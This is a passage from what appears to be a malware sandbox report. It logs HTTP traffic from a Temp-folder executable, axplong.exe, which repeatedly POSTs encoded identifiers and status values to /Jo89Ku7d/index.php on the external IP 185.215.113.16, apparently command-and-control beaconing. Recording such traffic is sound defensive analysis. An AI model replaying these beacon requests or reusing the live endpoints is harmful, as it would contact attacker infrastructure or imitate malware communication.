                  Sep 26, 2024 18:29:44.008317947 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:44.237608910 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.649757185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:44.346652985 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:45.056231022 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:45.057060003 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:45.288295031 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.649758185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:45.409107924 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:46.138456106 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:46.141603947 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:46.376987934 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.649759185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:46.487718105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:47.221355915 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:47.222399950 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:47.453680038 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.649760185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:47.565839052 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:48.265929937 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:48.267065048 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:48.492898941 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.649761185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:48.612292051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:49.313538074 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:49.314475060 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:49.540241003 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.649762185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:49.665596008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:50.374865055 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:50.375943899 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:50.602884054 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.649763185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:50.722805977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:51.432419062 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:51.433691025 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:51.659534931 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.649764185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:51.768706083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:52.477205038 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:52.479969978 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:52.703176022 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.649765185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:52.815404892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:53.529804945 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:53.530819893 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:53.763443947 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.649766185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:53.878329992 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:54.596925020 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:54.597805977 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:54.829689980 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.649767185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:54.943310976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:55.695058107 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:55.696331978 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:55.925283909 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.649768185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:56.034621954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:56.743649006 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
